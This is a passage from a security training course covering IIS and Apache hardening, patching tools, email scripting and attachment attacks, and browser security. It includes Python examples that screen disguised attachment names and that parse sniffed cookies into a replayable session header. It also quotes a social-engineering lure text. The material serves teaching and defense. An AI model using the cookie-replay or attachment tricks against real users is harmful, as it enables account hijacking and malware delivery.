
2. Click the Performance tab.

3. Check Enable Process Throttling, and specify a maximum CPU use of 25 percent. The right figure depends on how many Web sites the machine hosts and how much CPU each of them is entitled to.

4. Check Enforce Limits; otherwise, the only action that the Web server will take when the limit is crossed is to write an event to the Event Log.

5. Check Enable Bandwidth Throttling, and specify that the maximum bandwidth available to this Web site is 256 KB/s.

6. Leave the Newweb Properties open for the next task.

Web Server Directory Security

On a production machine, the home directory should not be located on the same partition as the operating system, as mentioned earlier. It should be on a separate NTFS partition; it could also be located on another machine on the network. Directory browsing should not be allowed, access to the script source should not be allowed, and only Read access to the Web site should be allowed. Keeping content off the system partition limits what a directory-traversal bug in the Web server can reach, and denying Write and Script Source Access keeps an attacker from uploading content or reading the logic (and any embedded credentials) in your ASP pages. In the next task, you will take a look at some of these configuration options.

TASK 7C-6: Controlling the Home Directory Settings

Setup: The Newweb Properties are displayed.

1. Click the Home Directory tab.

2. Observe that you can control where the content should come from. Options include a directory on this computer, a share on some other computer on this network, or even a redirection to another URL. Leave this alone for now. Below this are some check boxes relating to Web site access.

3. Verify that Script Source Access, Write, and Directory Browsing are unchecked.

Web Server Access Controls

Access to your Web site can be controlled by specifying that only certain computers or domains should be granted access. You can also do the opposite: explicitly deny access to a computer or to a group of computers. Keep in mind that these restrictions key on the client's source IP address, so they offer nothing against a connection that is relayed through a permitted host, and a domain-name restriction forces a reverse DNS lookup on every request, which is slow and only as trustworthy as the DNS servers it consults.


TASK 7C-7: Controlling Access Settings

Setup: The Newweb Properties are displayed.

1. Click the Directory Security tab.

2. Observe that there are three main areas you can work with regarding controlling access. They are Anonymous Access And Authentication Control, IP Address And Domain Name Restrictions, and Secure Communications. For now, you will work with just the middle option.

3. Click the Edit button next to IP Address And Domain Name Restrictions.

4. Observe that, by default, all computers will be granted access. You want to be more restrictive than the default.

5. Click Add.

6. Observe that you can specify a single machine, a group of machines, or a domain.

7. Leave the radio button selected for Single Computer.

8. Specify the IP address of your partner’s computer. If your IP address is 172.26.10.1, specify that you will deny access to 172.26.10.2, and vice versa. Click OK twice.

9. Click OK, and restart your Web server.

10. Ask your partner to visit your Web site. Access to your Web site should be forbidden. Your partner should receive the message You Are Not Authorized To View This Page (an HTTP 403 response).

11. Stop your Web server again.

12. On the Directory Security tab of the Web server’s Properties, click the Edit button next to IP Address And Domain Name Restrictions.

13. Select the computer that you have denied access to.

14. Click Remove, then click OK.

15. Click OK, and restart your Web server.

16. Ask your partner to visit your Web site. Your partner should be successful.

17. Close all open windows.


Patches and Hot Fixes

You have looked at some of the configuration options presented to you by IIS. However, if the underlying software itself is defective and has security holes, then no amount of “correct configuration” will help you. For this, you must be on the lookout for the latest announcements of attacks on Web servers, vulnerabilities discovered, and the ensuing fixes provided by Microsoft. Microsoft publishes security bulletins for these and works with researchers in the industry to provide a fix for a problem before it is widely exploited.

Routinely checking for and applying updates to your Microsoft servers is recommended. Using the Windows Update command found in the Start menu takes you directly to Microsoft’s Windows Update site, where your machine will be scanned to determine which service packs and security hot fixes are already installed. This can also be automated so that your machine periodically checks for updates without intervention by you. In enterprise scenarios, you might not want your production machines to go out and update themselves automatically. Instead, you should apply such updates on a test machine first. Each security fix is also released by Microsoft as a separately downloadable hot fix, so once a patch has passed testing you can apply exactly that patch to your production machines.

One such update, posted on October 30, 2002, Q327696, addresses four newly discovered security vulnerabilities affecting Web servers running on Windows computers:

• Out-of-process Privilege Escalation

• WebDAV Denial of Service

• Script Source Access Vulnerability

• Cross-site Scripting in IIS Administrative Pages

The first of the four in this list could enable applications on a server to gain system-level privileges. It was posted on Microsoft’s Web site with a severity rating of Moderate.

If you were to visit Microsoft’s site, you would also see that these four vulnerabilities had the numbers shown in the following table.

Number          Vulnerability
CAN-2002-0869   Out-of-process Privilege Escalation
CAN-2002-1182   WebDAV Denial of Service
CAN-2002-1180   Script Source Access Vulnerability
CAN-2002-1181   Cross-site Scripting in IIS Administrative Pages

These numbers are hyperlinked to the Web site www.cve.mitre.org, where Common Vulnerabilities and Exposures are catalogued and the information is shared. An entry that has been reviewed and accepted by the CVE Editorial Board is prefixed with the letters CVE, followed by the year and a sequence number. Until then, the same number carries the temporary prefix CAN, for candidate. The number itself does not change when a candidate is accepted, so CAN-2002-0869 and CVE-2002-0869 refer to the same issue. (MITRE retired the CAN prefix in 2005; every entry now carries CVE from the start.)

Another good tool to use with IIS is the IIS Lockdown tool, also downloadable from Microsoft’s site at www.microsoft.com/downloads/release.asp?ReleaseID=43955. Follow this hyperlink and download the file iislockd.exe.


TASK 7C-8: Using the IIS Lockdown Tool

1. Copy the file iislockd.exe from the location provided by your instructor to your desktop.

2. Double-click iislockd.exe, and click Next.

3. Click I Agree, and then click Next.

4. Specify that you want to use the Dynamic Web Server (ASP Enabled) template, check View Template Settings, and click Next.

5. Check HTTP and FTP, and verify that SMTP and NNTP are unchecked. If a server has not been installed before, it will be grayed out and will not offer you any choice.

If you were implementing this tool in a production environment and were sure that you would not use SMTP, then you would check Remove Unselected Services.

6. Leave the Remove Unselected Services check box unchecked for now, and click Next.

The next page deals with script maps and is important.

7. Observe that, on the Script Maps page, the boxes you check are the ones that will be disabled. Each script map ties a file extension (.asp, .idq, .htr, .printer, and so on) to an ISAPI DLL that IIS loads to handle requests for that extension. A mapping you do not use is attack surface for nothing in return, and several of the IIS vulnerabilities of this period were in exactly these DLLs.

8. Verify that only the box for ASP is unchecked, and click Next.

On the Additional Security page, again, all of the options that you select will be removed.

9. Leave the Additional Security options checked as they are, and click Next.

10. Click Next to install the URLScan filter.

11. Verify the summary presented to you, and click Next.

12. Wait until the security settings are applied, then click Next, and click Finish. It takes only a minute or two to apply the security settings.

Hot-fix Checker

One good tool to use on a Windows box is the hot-fix checker HfNetChk. By downloading the tool from www.microsoft.com and running it, you will very quickly be able to record which hot fixes and service packs are installed on your machine, as well as which Knowledge Base articles you have to read to find out more about a particular fix. The tool compares the machine against an XML list of available fixes that it downloads from Microsoft, so it reports the patches you are missing, not just the ones you have.

Instructor note: Provide students with the location of the IIS Lockdown tool file.


An excellent article on Microsoft’s Web site regarding how to harden a Windows 2000 Server with IIS running on it is Knowledge Base Article Q311135. A summary of the sequence of tasks is presented here. Please visit Microsoft’s Web site to read the full article.

1. Install Service Pack 3.

2. Run Windows Update.

3. Install and run all IIS updates.

4. Install and run Hfnetchk to compile a list of needed hot fixes.

5. Install Qchain.exe.

6. Use Qchain.exe to install multiple hot fixes with only one restart.

TASK 7C-9: Using the Hot Fix Net Check Tool

1. Copy the nshc332.exe file from the location provided by your instructor to your desktop.

2. Double-click nshc332.exe, and click Yes twice to install and to accept the License Agreement.

3. Point to a location where you want to install the extracted files, and click OK. For instance, you could create a folder on your boot partition named hfnetchk, and install the files there.

4. Read the instructions presented to you, and click OK.

5. Open a command prompt, and navigate to the folder where you extracted the files in step 3.

6. Enter hfnetchk to check your OS installation. If you are not connected to the Internet, you may see a couple of error messages while the executable attempts to contact microsoft.com to download the current list of fixes, but you can ignore these for now.

7. View the results.

8. Enter hfnetchk /? to see the Help associated with this executable.

9. Read the description of what HFNETCHK does. If you can lay your hands on the Microsoft Knowledge Base Articles Q303215 and Q315665, they will provide additional information. Both of these articles are available from Microsoft’s Web site.

10. Examine the various switches available for use with the tool.

11. Enter hfnetchk -v to obtain more detailed output.

12. View the results.

13. Close all open windows.

Instructor note: Provide students with the location of the Hot Fix Net Check tool file.


Apache

For all the press that Microsoft’s IIS has gotten regarding security vulnerabilities, such as those detailed above, you might think that it is the most widely deployed Web server, but this is not the case. The Web server that runs the majority of the Web sites on the Internet is called Apache. In a recent survey, Apache servers were running 63 percent of the Web sites on the Internet. For comparison, IIS is running approximately 23 percent of the sites. Updated statistics can be found at www.netcraft.com.

Apache is an Open Source application that runs on Linux and UNIX computers (and on Windows as well). You can obtain the most recent version and release information at www.apache.org. In addition to the Web site, most Linux distributions include the application as well. Check the Web site associated with your release for current Apache updates.

Once Apache is running on your server, configuration can begin. The server is started as root so that it can bind port 80, but the processes that actually handle requests drop to an unprivileged account, named by the User and Group directives. On Red Hat style systems this account is apache; a default build from source uses nobody. This account neither needs nor should have write access to the server configuration directories, such as /etc/httpd/conf.

The configuration files are owned by root, and the apache user is given only read permission to these files. It is suggested that you create a dedicated administrative account to manage these files rather than editing them as root. Whatever you do, do not make the apache user the owner of these files: if the server process is compromised, an attacker who can write httpd.conf can rewrite the server’s security policy.

One of the files that can be created and used by the Apache server is the .htpasswd file. This file contains user names and passwords for authentication to the server. The passwords are stored as one-way hashes (crypt, MD5 or SHA, depending on how htpasswd was run), not in the clear, but the file itself is ordinary text and must still be protected: a file created by root is owned by root and the root group, and the only additional access it should ever get is read access for the group the server runs as. Keep it outside the document tree so that it can never be served.

Another critical file for configuration is the httpd.conf file. Previously, the config options were stored in three separate files: access.conf, srm.conf, and httpd.conf. Now, the only file that requires editing is httpd.conf. Although there are many different options for managing this file, we will look at some of the parameters.

• The ServerType option is used to define whether the Apache server will run on its own or be started by inetd for each connection. It is recommended that the server run on its own, as a standalone server. (This directive exists only in Apache 1.3; Apache 2.0 dropped inetd mode and is always standalone.)

• The KeepAlive option controls whether a client may send several requests over one TCP connection. The related KeepAliveTimeout directive sets how long an idle connection waits for the next request, and MaxKeepAliveRequests caps how many requests one connection may carry. A short timeout limits how long an idle or malicious client can tie up a server process.

• The ServerRoot option is used to define the root of the server, the directory under which its configuration, logs and modules live. It is very strongly recommended that the server root not be the filesystem root directory itself. Commonly, /etc/httpd (on Red Hat style systems) or /usr/local/apache (a build from source) will be the server root.

These are just a few of the many configuration options that you will have when you are configuring a secure Apache Web server. Once you have locked down your server, you may see why this is the most popular Web server on the Internet.
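As an added example, not from the course or the Apache project, the following httpd.conf fragment applies the points above for Apache 1.3 on a Red Hat style layout. The paths (/etc/httpd, /var/www/html, /var/www/html/private), the apache user and group, and the protected directory are assumptions for this example; adjust them to your build. Apache does not allow a comment on the same line as a directive, so the comments sit on their own lines.

```apache
# Added example: hardened httpd.conf fragment for Apache 1.3.
# Paths, user/group and the protected directory are assumptions.

# Run standalone, not from inetd (1.3 only; 2.0 has no ServerType).
ServerType standalone
# Never use "/" as the server root.
ServerRoot "/etc/httpd"
# Unprivileged account for the request-handling processes. It must not
# own httpd.conf or anything else under the server root.
User apache
Group apache

# Reuse connections, but do not let an idle client hold a server
# process for long.
KeepAlive On
KeepAliveTimeout 15
MaxKeepAliveRequests 100
Timeout 60

# Give attackers as little as possible to fingerprint.
ServerTokens Prod
ServerSignature Off

# Deny everything on the filesystem by default ...
<Directory />
    Options None
    AllowOverride None
    Order deny,allow
    Deny from all
</Directory>

# ... then open only the document root: no directory listings,
# no server-side includes, no CGI execution from content directories.
DocumentRoot "/var/www/html"
<Directory "/var/www/html">
    Options -Indexes -Includes -ExecCGI
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>

# Never serve .htpasswd, .htaccess or any other .ht* file, even if one
# ends up inside the document tree by mistake.
<Files ~ "^\.ht">
    Order allow,deny
    Deny from all
</Files>

# Password-protected area. Create the password file outside the document
# tree with hashed (MD5) passwords, readable by the server's group only:
#   htpasswd -cm /etc/httpd/conf/.htpasswd alice
#   chown root:apache /etc/httpd/conf/.htpasswd
#   chmod 640 /etc/httpd/conf/.htpasswd
<Directory "/var/www/html/private">
    AuthType Basic
    AuthName "Restricted"
    AuthUserFile /etc/httpd/conf/.htpasswd
    Require valid-user
</Directory>
```

After editing, run apachectl configtest to catch syntax errors before apachectl graceful reloads the configuration. The deny-everything block on the filesystem root is the part most often missing from default configurations: with it in place, an Alias or a symbolic link that accidentally points outside the document tree still serves nothing.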


Topic 7D: Describing Methods Used to Attack Users

In the past (meaning the late 1980s to early 1990s), most users of the Internet were technical in nature, and connections to the Internet were not that common. Once the World Wide Web began evolving and large-scale national ISPs began showing up, casual users started to log on. By the year 2000, there were many people who considered their Internet connections more vital to their lives than having the lights on.

Such an evolution, so fast, has come with downsides. The vast majority of users on the Internet are not even aware of security issues, let alone taking steps to protect themselves. Many ISPs do not provide adequate security-related information to their users, and more and more people connect each day.

Email Hack Attacks

Of all the potential areas where users of the Internet are at risk, perhaps their email systems are the most vulnerable. More precisely, the risk lies in what can be done through the email system.

Email hacking generally is done using one of two methods. The first is to make the email message itself the attack, by using HTML. The second, and more common, is to attach malicious files to email messages and send them to unknowing victims.

HTML Email Attacks

HTML email attacks are popular, but a bit harder than they seem to be at first glance. The premise of HTML email hacking is to embed the hacker’s code into the actual body of the message, so that it is executed by the receiving user’s computer, but is not visible to that user.

The ability to create an HTML email message in Outlook Express (and Outlook) is built in to the program. To turn on HTML composing:

1. Open Outlook Express.

2. Choose Tools→Options.

3. In the Options dialog box, select the Send tab.

4. On the Send tab, under Mail Sending Format, select HTML.

5. Click OK.

Further options for HTML formatting of Outlook Express email are the choices of different MIME (Multipurpose Internet Mail Extensions) encoding options, and sending pictures with a message. See Figure 7-10 for an example of these settings.

Hack Attacks Targeting Users


Figure 7-10: The encoding options for HTML email in Outlook Express.

Although users and hackers have the option to turn on HTML encoded email, simply having the option to do so does not mean that hackers use HTML effectively. It is much easier for most hackers to persuade victims to open attachments, as we will see in a moment.

That being said, let’s take a look at an example of an email message encoded in HTML, shown in Figure 7-11.

Figure 7-11: An example of an HTML email as a text document.


This email is harmless, but it is evident that what can be encoded in HTML is limited only by the imagination of the composer.

Scripting Vulnerabilities

Although the possibilities of HTML encoded email are unlimited, there are specific areas of the target user’s computer that the hacker will want to take advantage of. One of these is the ability of the user’s email client to execute scripts.

Outlook and Outlook Express have made the lives of hackers much easier by allowing a user to be attacked simply by reading an email or viewing it in the Preview pane. This is because both clients render HTML mail with the same engine as Internet Explorer, including its support for script and for the ActiveX controls that these Microsoft programs expose. We will move off the subject of email hacking for a moment to define ActiveX.

• ActiveX is an implementation of mobile code by Microsoft. The Microsoft definition of ActiveX is “A set of technologies that allows software components to interact with one another in a networked environment, regardless of the language in which the components were created.”

• ActiveX applications (controls) are written to provide a specific purpose, such as showing a movie clip, and are embedded into Web pages to provide this ability. The ActiveX controls, which usually have an .OCX file extension, are embedded into Web pages by using the <OBJECT> tag, which names the control by its class identifier (CLSID). Upon entering a Web site that has an embedded control, Internet Explorer checks the local user’s Registry for that CLSID to locate the required component. If the control is not already on the user’s system, Internet Explorer downloads it from the location given in the tag’s CODEBASE attribute and installs it.

• To stop a hacker from executing any control they wish, Microsoft included a code-signing system called Authenticode. Authenticode requires software developers to sign their work, and a notice of this shows on the user’s screen in the form of a pop-up window naming the publisher. If the control has not been signed under the Authenticode system, a warning pops up, informing the user of this. Note what the signature proves: only that the control came from the named publisher and has not been altered since, not that the code is safe to run.

• Although the Authenticode system is effective, Microsoft has created an ActiveX issue with their Safe For Scripting flag. A control marked safe for scripting may be driven by script on any Web page (or HTML email) without any prompt, because what matters at that point is not who signed the control but whether it is already installed and carries the flag. Two controls that ship with IE have this flag set. To compound the issue, both controls, named Scriptlet.typelib and Eyedog.OCX, have the ability to access the user’s files. Additionally, Scriptlet.typelib has the ability to edit, create, and even overwrite files on the user’s local hard drive. Microsoft’s fix for both (security bulletin MS99-032) sets the “kill bit” for the two controls so that IE will no longer instantiate them.

• The code example shown in Figure 7-12 was written by Georgi Guninski, who has found many security vulnerabilities and has provided full documentation on them. This code would execute upon viewing the associated Web page. The end result of this code is a simple alert window, but the only limitation is the imagination.


Figure 7-12: Georgi Guninski’s example of Safe For Scripting vulnerabilities.

The code shown in Figure 7-12 illustrates an example of embedding scripting in Web pages. Next, we will discuss the option to embed code into email messages.

Just as IE honors Safe For Scripting, so do Outlook and Outlook Express. By composing an HTML email message that calls the correct control, as in the Web example above, users can end up executing unknown code.

Email scripting problems for Outlook and Outlook Express can be greatly diminished by disabling the Preview pane. In most situations, simply previewing the message with the code is all that is required for execution. Disabling preview only removes the automatic trigger, however; opening the message still runs the script. The stronger fix is to have the client render mail in the Restricted Sites security zone, where script and ActiveX are disabled. Outlook 2002 and Outlook Express 6 do this by default, and earlier versions can be set to it on the Security tab under Tools→Options.

File Attachments

Nearly all email users have, at some point in time, used the file-attachment feature of email. Sending documents to and receiving documents from others quickly is one of the most important features of being connected on the Internet, and one of the reasons many people connect in the first place.

This natural desire to connect and exchange data (file attachments) is exactly what hackers take advantage of. And, do they ever!

Why bother with complicated scripting or other techniques to get a user to launch the code of choice the hard way, when it would be much easier to simply send him or her the code and have the targeted user run it? This is now the only method used by some hackers.

Administrators battle this problem every minute of every day. Even though users (and administrators are also users) are instructed not to open attachments from unknown sources, they still will and do. The issue gets even more complex, however.

Just when the word was starting to sink in that no one should ever open an attachment from an unknown source, along came the attack of the worms.

Melissa was the first high-profile example of this new breed of attack. The attack was simple: arrive as an attachment, then mail a copy of the message to the entries in the victim’s Address Book. (Melissa, in 1999, was a Word document carrying a macro; ILOVEYOU, in 2000, was a Visual Basic script.) The ILOVEYOU worm continued this method, bringing email systems to a halt again. Networks were flooded with virtually the same email message, only with different senders and receivers.


Since everyone is supposed to know not to open unknown attachments, how did ILOVEYOU become so effective? The answer is simple: it did not come from an unknown source. It was replicated from someone to their Address Book, meaning that they, at least casually, knew the recipients. The line “kindly check the attached LOVELETTER coming from me” was too much temptation for people to ignore.

A different type of attachment trick, although still used, is less effective as the user base becomes more educated about attachments. This technique is to pad the real name of a file by using spaces. A file may look like it is named tonight.doc, but if one looks carefully, the associated icon is not a document icon, and there are other visual indicators to the right of the file name, such as the standard three periods in parentheses (…). This indicates a name longer than tonight.doc, and is worth exploring further to see the true identity of the file. The real extension, the one Windows acts on when the file is double-clicked, is whatever follows the last period, however far to the right the padding has pushed it, and it is hidden outright when Explorer’s Hide File Extensions For Known File Types option is on.

In Figure 7-13, you can see that the file name, on first glance, says tonight.doc, but there are signs that the file is not a document. It has the executable icon, and the (…) would lead to the conclusion that there is a long file name issue here. This file will need investigation before execution (if it even will be executed).

Figure 7-13: An example of a hidden extension.

The final approach to email attachments we will discuss here is to use the built-in messages Outlook has for errors and notifications. The following is one of the more common ones that hackers may employ:

“This message uses a character set that is not supported by the Internet Service. To view the original message content, open the attached message. If the text doesn’t display correctly, save the attachment to disk, and then open it using a viewer that can display the original character set.”

This message normally appears in conjunction with errors in MIME processing. It can just as easily be used to convince users to open attachments they would not normally open. The imagination becomes the only limitation on using this.
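The padded-name and double-extension tricks described above can be caught at a mail gateway before a user ever sees the icon. The following Python is an added example, not code from the course: it applies those checks to a few constructed attachment names (the padded tonight.doc of Figure 7-13, the ILOVEYOU attachment name LOVE-LETTER-FOR-YOU.TXT.vbs, and two ordinary files) and also shows what a user with Hide File Extensions For Known File Types sees. The set of executable extensions is an assumption; extend it for your own environment.

```python
import re

# Extensions Windows runs directly when a file is opened. This list is an
# assumption for the example, not something stated in the course.
EXECUTABLE_EXTENSIONS = {
    "exe", "com", "scr", "pif", "bat", "cmd", "vbs", "vbe", "js", "jse",
    "wsf", "wsh", "hta", "lnk",
}
# Document types that can carry macros (Melissa arrived as one).
MACRO_EXTENSIONS = {"doc", "dot", "xls"}

# Constructed sample names: the padded tonight.doc from Figure 7-13, the
# ILOVEYOU attachment name, and two ordinary files.
SAMPLE_ATTACHMENTS = [
    "tonight.doc" + " " * 60 + ".exe",
    "LOVE-LETTER-FOR-YOU.TXT.vbs",
    "quarterly-report.doc",
    "photo.jpg",
]


def displayed_name(name):
    """What a user with 'Hide file extensions for known file types' sees.

    Explorer and Outlook drop the final, registered extension, so
    LOVE-LETTER-FOR-YOU.TXT.vbs is shown as LOVE-LETTER-FOR-YOU.TXT.
    """
    return name.rsplit(".", 1)[0] if "." in name else name


def analyze_attachment(name):
    """Classify one attachment name as allow / warn / block, with reasons."""
    findings = []
    parts = [p.strip() for p in name.split(".")]
    # Windows acts on whatever follows the LAST period, however far the
    # padding has pushed it to the right.
    real_ext = parts[-1].lower() if len(parts) > 1 else ""
    # A short alphanumeric token just before it is a decoy extension.
    decoy_ext = ""
    if len(parts) > 2 and 1 <= len(parts[-2]) <= 4 and parts[-2].isalnum():
        decoy_ext = parts[-2].lower()

    if re.search(r"\s{3,}\.[A-Za-z0-9]+$", name):
        findings.append("whitespace padding hides the real extension")
    if decoy_ext and real_ext in EXECUTABLE_EXTENSIONS:
        findings.append(f"double extension: shown as .{decoy_ext}, runs as .{real_ext}")
    if real_ext in EXECUTABLE_EXTENSIONS:
        findings.append(f"executable extension .{real_ext}")
    elif real_ext in MACRO_EXTENSIONS:
        findings.append(f"macro-capable document .{real_ext}")

    if real_ext in EXECUTABLE_EXTENSIONS:
        verdict = "block"
    elif findings:
        verdict = "warn"
    else:
        verdict = "allow"
    return {
        "name": name,
        "displayed_as": displayed_name(name),
        "real_extension": real_ext,
        "findings": findings,
        "verdict": verdict,
    }


def screen_attachments(names=SAMPLE_ATTACHMENTS):
    """Run the check over a list of names; returns {name: verdict}."""
    return {n: analyze_attachment(n)["verdict"] for n in names}


if __name__ == "__main__":
    for n in SAMPLE_ATTACHMENTS:
        r = analyze_attachment(n)
        print(f"{r['verdict']:5} {r['displayed_as']!r:40} {'; '.join(r['findings'])}")
```

The verdict is driven by the real extension, never by what the name looks like: a name that merely looks odd gets a warning, while anything Windows would execute is blocked outright, which is the policy most mail gateways of the period adopted after ILOVEYOU.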


Cookies

No discussion of the security of users of the Internet would be complete without a discussion of cookies. Cookies are, for now, a necessary evil. Without cookies, users of their favorite Web sites would have to continuously re-enter information. Cookies are divided into one of two types: persistent and per-session.

• A persistent cookie is one that carries an expiry date (the Expires or Max-Age attribute) and is stored in a text file on the user’s hard drive until that date.

• A per-session cookie is one that has no expiry date; the browser holds it in memory only during the open session, and when the browser is closed, it is no longer stored.

In the event that a user’s system is compromised, a search for cookies could reveal much personal information about that user. But it is possible to gain access to a cookie without even attempting to compromise a user’s system.

By using a packet sniffer tool (such as Network Monitor or Ethereal), hackers can capture the cookie as it travels on the wire. Once the cookie has been captured, it can be replayed against the target server, and the hacker can enter the Web site using his or her new identity. This works because most sites use the cookie as the sole proof of who the user is after login, and the cookie crosses the network in the clear unless the site is served over SSL. A site that sets the Secure attribute on its session cookie tells the browser never to send it over plain HTTP, which takes it out of the sniffer’s reach.

Disabling cookies might seem like a good idea, but most people could not use the Web to do what they want without using cookies. Using the option of Prompt Before Acceptance Of Cookies will annoy most people enough to turn off the option within the first few minutes of browsing their favorite sites.
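The capture-and-replay described above, as an added example that is not part of the course: a small Python script that parses the Set-Cookie headers from a constructed login response (the cookie names and values are invented), sorts them into persistent and per-session, reports which of them a sniffer on a plain-HTTP link would actually see, and builds the Cookie header an attacker would replay. It also checks for the HttpOnly attribute, which is newer than the two cookie types above (Internet Explorer 6 SP1 introduced it) and keeps page script from reading a cookie.

```python
from email.utils import parsedate_to_datetime

# Constructed HTTP response, as a sniffer on the wire would see it after a
# successful login over plain HTTP. Names and values are invented.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: SESSIONID=7f3a9c21e4; Path=/\r\n"
    "Set-Cookie: userid=jdoe; Expires=Fri, 31 Dec 2004 23:59:59 GMT; Path=/\r\n"
    "Set-Cookie: theme=blue; Max-Age=2592000; Path=/; Secure\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>Welcome back, jdoe</html>"
)


def parse_set_cookie(header_value):
    """Parse one Set-Cookie header value into a dict of its parts."""
    pieces = [p.strip() for p in header_value.split(";")]
    name, _, value = pieces[0].partition("=")
    cookie = {"name": name.strip(), "value": value.strip(),
              "expires": None, "max_age": None,
              "secure": False, "httponly": False}
    for attr in pieces[1:]:
        key, _, val = attr.partition("=")
        key = key.strip().lower()
        if key == "expires":
            cookie["expires"] = parsedate_to_datetime(val.strip())
        elif key == "max-age":
            cookie["max_age"] = int(val.strip())
        elif key == "secure":
            cookie["secure"] = True
        elif key == "httponly":
            cookie["httponly"] = True
    return cookie


def cookies_from_response(raw):
    """Return the parsed cookies from the header block of a raw response."""
    head = raw.split("\r\n\r\n", 1)[0]
    return [parse_set_cookie(line.split(":", 1)[1])
            for line in head.split("\r\n")
            if line.lower().startswith("set-cookie:")]


def is_persistent(cookie):
    """Persistent cookies carry Expires or Max-Age; session cookies carry neither."""
    return cookie["expires"] is not None or cookie["max_age"] is not None


def audit(cookie, over_tls=False):
    """Findings for one cookie seen in a sniffed response."""
    findings = ["persistent: written to disk" if is_persistent(cookie)
                else "session: held in memory until the browser closes"]
    # A Secure cookie never crosses a plain-HTTP link, so it is sniffable
    # only when the site itself is served without SSL.
    if not over_tls and not cookie["secure"]:
        findings.append("sent in the clear: sniffable and replayable")
    if not cookie["httponly"]:
        findings.append("readable by page script (no HttpOnly)")
    return findings


def replay_header(cookies, over_tls=False):
    """Build the Cookie request header an attacker would replay.

    Only cookies the browser would have sent on that kind of link are
    included: Secure cookies are absent from a plain-HTTP capture.
    """
    sendable = [c for c in cookies if over_tls or not c["secure"]]
    return "Cookie: " + "; ".join(f"{c['name']}={c['value']}" for c in sendable)


if __name__ == "__main__":
    captured = cookies_from_response(SAMPLE_RESPONSE)
    for c in captured:
        print(c["name"], "->", "; ".join(audit(c)))
    print(replay_header(captured))
```

Run against the sample, the session cookie SESSIONID is the one that matters to an attacker: it is the login credential, it is sent in the clear, and the replay header reproduces it exactly. The theme cookie, marked Secure, never appears in a plain-HTTP capture, which is the whole value of that one attribute.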

DSL and Cable Modem Vulnerabilities

With the advent of high-speed, always-on Internet connections for the home user, ISPs have created a whole new playing field for hackers. No longer are the long hours of searching for potential targets required. If a hacker is simply looking for a target to practice on, there are now thousands of targets within the hacker’s immediate reach.

These thousands of people were potential targets before, but a user who is only on every now and then, with a slow connection and a different IP address every time, is not the most attractive of targets. High-speed Internet access has changed all that.

No longer is that potential target moving; generally, high-speed Internet connections have static IP addresses or dynamic addresses that are renewed to the same value for months at a time. No longer is that potential target on a slow connection every now and then. Once the hacker has identified the target, he or she can be confident that the target will be there in the future and ready to respond, only a few ping packets away.

Virtually all home users who are now enjoying their newly found high-speed access, and are leaving their computers on 24x7 to take advantage of all they can, are unaware of the increased security risks they now face.

It is hard enough for full-time security administrators to get the users in their networks to follow solid security practices, so imagine the situation for the home users. If they just purchased a shiny new PC with Windows 2000 Professional loaded, why would they know to modify the Administrator account properties, or to turn on logging?

Hackers around the world are, at this very moment, scanning for these systems to use at their discretion.

packet sniffer: A device or program that monitors the data travelling between computers on a network.

sniffer: A program to capture data across a computer network. Used by hackers to capture user ID names and passwords. A software tool that audits and identifies network traffic packets. It is also used legitimately by network operations and maintenance personnel to troubleshoot network problems.


TASK 7D-1: Identifying User Vulnerabilities and Internet Security Concerns

Setup: This is a group activity.

1. Discuss, with at least one other student, the security issues surrounding users of the Internet and World Wide Web. Identify the different risk points discussed, and list the areas of greatest concern for these users. Define what the potential counters for these risks are.

2. As a group, combine the topics of this lesson into a comprehensive view of the architecture of the Internet and associated risk points. Use your previous work on the physical structure of the Internet, adding potential locations of Web servers and users.

3. Once the overall layouts of components, servers, and users have been identified, attempt to define the potential risk points for each piece. Are the risk points for the Internet infrastructure as critical now that you can combine all the other issues versus when that was the only concern?

4. Try to categorize the risk points of the entire scenario in order of risk. There is no definite order to them, as they are subject to opinion.

Create a consensus on the risk points and outline them for future reference. These risk points are the same in this scenario as they are on the actual Internet.

Browser Security

“The security setting on your browser should match your need for security or privacy and there’s no cookie cutter approach to this.”—somewhere on www.dslreports.com.

If you visit http://browsers.evolt.org, you will be presented with an array of browsers, many of which are in use today, including Arachne, Cello, Chimera, Grail, HotJava, IBrowse, Internet Explorer, InterGo, Internet Workhorse, I-View, Lotus Notes, Lynx, Mosaic, NeoPlanet, NetCruiser, Netscape, Mozilla, Opera, Quarterdeck, Spyglass, Sesame, Tango, Teleport Pro, Voyager, WebExplorer, and WebTV, among others.

There are text-based browsers, there are voice-based browsers, and there are colorful and fun browsers that you can customize to change their look and feel. But the two most debated browsers are still Internet Explorer and Netscape. The consensus is that the browser wars are over, and Netscape lost—at least for the present time. Of course, it’s still a good product, so if you’re keeping tabs, you wouldn’t just write it off. Consider this: At the time of this writing, Netscape had launched version 7.0 for Windows, Macintosh, and Linux machines, and Netscape’s browser engine, Gecko, was going to be integrated into parent company AOL’s customized browser—in effect, putting Netscape on the desktops of over 20 million users.

Lesson 7: Security on the Internet and the WWW 461


So what is a browser? A browser is the client side of an application that is typically used to view Web pages hosted on a Web site, which runs the server side of the application. Of course, today you can also use a browser to download files from or upload files to an FTP server, or to reach your mailbox through a Web mail front end that in turn talks to an IMAP-enabled email server on your behalf.

The concept of a Web browser/Web server combination was thought of, experimented upon, and crystallized by Tim Berners-Lee while he worked at CERN in Switzerland. He literally invented the Web. Of course, someone else claims to have invented the Internet. Those who would like to learn more about Berners-Lee’s groundbreaking work should read his book, “Weaving the Web.”

Meanwhile, Internet Explorer 6 (IE6) has been marching ahead—hot fixes, service packs, and all—and taking over market share from earlier versions. Between these new versions of Internet Explorer and Netscape, you get more features, so you have more configurable options, which therefore translates to more headaches for network administrators.

General Settings for Internet Explorer 6

Let’s look at some of the configurable options in Internet Explorer version 6, all the while concentrating on those issues that relate to its security. You will first verify what version of IE you’re running. You will then proceed to go through the steps required to configure its security settings. The following tasks are a bit different from the other tasks in the course, in that you are basically doing a walk-through of the various settings in IE so that you can better understand the implications of changing these settings. You will not actually configure any of these settings. You would, by understanding their implications, use this knowledge and perhaps use a Group Policy or the Internet Explorer Administration Kit (IEAK) to configure robust security settings for your enterprise.

TASK 7D-2
Viewing the General Settings for Your Browser

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Start Internet Explorer.

2. Choose Help→About Internet Explorer.

3. Verify that your version is 6.x, and click OK. If it is not, upgrade Internet Explorer to version 6.x, so that you can follow the rest of the steps in the following set of tasks. At the time of this writing, Microsoft had released Service Pack 1 (for IE6).


